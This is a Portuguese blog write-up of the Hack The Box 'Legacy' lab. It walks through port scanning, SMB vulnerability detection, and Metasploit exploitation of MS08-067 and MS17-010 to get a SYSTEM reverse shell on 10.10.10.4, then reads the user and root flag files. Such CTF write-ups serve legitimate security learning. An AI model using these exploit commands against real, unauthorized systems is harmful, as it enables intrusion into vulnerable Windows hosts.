Hack the Box – Legacy Writeup

Hack the Box – Legacy Writeup

Usaremos Metasploit neste post

Hoje veremos o writeup completo da máquina Legacy do Hack The Box!
Link de acesso: https://app.hackthebox.com/machines/Legacy

Descrição

A máquina Legacy é bastante simples para iniciantes que demonstra os potenciais riscos de segurança do serviço SAMBA/SMB no Windows.
Apenas um exploit disponível publicamente é necessário para obter acesso de administrador e iremos os passos a seguir de como explorar este serviço.

Conhecimento requeridos:

  • Conhecimento básico em Windows
  • Enumeração de portas e serviços

Conhecimento que serão aprendidos:

  • Identificação de serviços vulneráveis
  • Exploração do serviço SAMBA/SMB

Reconhecimento

Inicialmente, utilizamos o Masscan para efetuar uma enumeração ágil dos serviços ativos na máquina, direcionando a saída para o arquivo “ports”

masscan -p1-65535,U:1-65535 10.10.10.4 --rate=1000 -p1-65535,U:1-65535 -e tun0 > ports

Popular a variável “ports” com as portas abertas identificadas

ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')

Em seguida, empregamos o NMAP para realizar uma varredura dos serviços identificados

nmap -Pn -sV -sC -p$ports 10.10.10.4

Observaçao: Esta é apenas uma forma de se fazer o scan de serviços ativos, mas sinta-se à vontade para usar outros métodos que desejar.

Resultado do scan:

Ao analisarmos esse resultado, podemos concluir que o sistema operacional em uso é o Windows (provavelmente a versão XP), bem como identificar que está sendo utilizado o serviço Samba/SMB na versão 2.

Podemos realizar uma nova verificação utilizando o NMAP para identificar possíveis vulnerabilidades no serviço samba/smb.

nmap -script smb-vuln* -p 139,445 10.10.10.4

Como podemos observar no print acima, a máquina apresenta vulnerabilidades tanto para a ms08-067 (CVE-2008-4250) quanto para a ms17-010 (CVE-2017-0143). Nesse caso, podemos verificar a disponibilidade de um módulo no Metasploit para explorar o serviço em questão.

Exploração através do ms08-067

msfconsole

search MS08-067

use exploit/windows/smb/ms08_067_netapi

set rhost 10.10.10.4

set lhost tun0

run

Vemos que obtemos sucesso na exploração, assim como conseguimos acesso com o usuário SYSTEM.
Observação: Vale ressaltar que não é necessário realizar a escalação de privilégio.

Exploração através do MS17-010

search MS17-010

A partir dessa lista, optamos por testar o primeiro módulo disponível, o exploit/windows/smb/ms17_010_eternalblue. Entretanto, durante a execução, foi verificado que esse módulo suporta somente sistemas operacionais Windows 5.1 x86 (32 bits), impossibilitando sua execução.

Sendo assim, a alternativa escolhida foi o módulo exploit/windows/smb/ms17_010_psexec, que é capaz de operar em sistemas de 32 bits.

Link referência: https://www.lmgsecurity.com/manually-exploiting-ms17-010/

use exploit/windows/smb/ms17_010_psexec

set rhost 10.10.10.4

set lhost tun0

run

Como podemos ver no print acima, após executar o exploit nós obtemos acesso com o usuário SYSTEM.
Observação: Vale ressaltar que não é necessário realizar a escalação de privilégio.

Flags do sistema

É necessário validar quais usuários estão ativos na máquina a fim de identificar a localização das nossas flags.

shell

net users

Agora que sabemos quais usuários estão ativos no sistema, o próximo passo é validar os diretórios do usuário “john” a fim de localizar a flag “user.txt”.
No entanto, antes de iniciar essa busca, é necessário verificar se o sistema possui a estrutura de pastas padrão em “C:\Users”, ou se há alguma outra organização de diretórios.

cd c:\

dir

A estrutura de pastas deste sistema difere da organização padrão do Windows, na qual a pasta “Documents and Settings” geralmente contém os arquivos dos usuários.
Dessa forma, podemos utilizar o comando abaixo para varrer a máquina em busca dos arquivos desejados, exibindo a estrutura de pastas em formato de estrutura árvore:

tree /f /a "c:\Documents and Settings"

Arquivos identificados

Flag user.txt

type "C:\Documents and Settings\john\Desktop\user.txt"

Flag root.xt

type "C:\Documents and Settings\Administrator\Desktop\root.txt"

Por fim, agradecemos a leitura e esperamos que este post tenha te ajudado de alguma maneira! Caso tenha alguma dúvida, entre em contato conosco pelo Telegram , Facebook ou Instagram ! Veja mais posts no IronLinux !

Tags:

Posts relacionados

Como habilitar o RDP no Windows 11

Como habilitar o RDP no Windows 11

O Remote Desktop Protocol (ou RDP) é um protocolo que permite acesso remoto a um sistema operacional Windows.

Ler post completo
Powershell Download & Execute

Powershell Download & Execute

Já precisou realizar o download de algum arquivo em Powershell e teve dificuldades?

Ler post completo
Do IIS User ao SYSTEM: Escalação de Privilégio Windows

Do IIS User ao SYSTEM: Escalação de Privilégio Windows

Neste post será demonstrado como escalar privilégios no IIS com Juicy Potato (MS16-075): Um exemplo de como uma má configuração pode levar ao comprometimento total de um Webserver.

Ler post completo